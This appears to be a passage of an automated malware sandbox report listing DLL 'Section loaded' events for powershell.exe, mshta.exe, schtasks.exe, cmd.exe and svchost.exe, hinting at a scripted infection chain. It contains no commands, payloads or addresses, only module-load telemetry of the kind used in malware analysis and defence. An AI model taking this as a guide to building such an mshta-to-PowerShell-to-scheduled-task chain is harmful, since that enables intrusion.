Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: mshtml.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: msiso.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: srpapi.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: msimtf.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: dxgi.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: textinputframework.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: coreuicomponents.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: coremessaging.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: dataexchange.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: d3d11.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: dcomp.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: jscript9.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: scrrun.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: version.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: edputil.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: appresolver.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: slc.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: sppc.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: msls31.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: d2d1.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: dwrite.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: d3d10warp.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: dxcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: mshtml.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: powrprof.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: umpdc.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msiso.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: srpapi.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msimtf.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dxgi.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: textinputframework.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: coreuicomponents.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: resourcepolicyclient.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: jscript9.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: scrrun.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: sxs.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: edputil.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: appresolver.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: slc.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dataexchange.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: d3d11.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dcomp.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: twinapi.appcore.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msls31.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: d2d1.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dwrite.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: d3d10warp.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dxcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: qmgr.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsperf.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: firewallapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: esent.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: fwbase.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: flightsettings.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netprofm.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsigd.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: upnp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ssdpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll
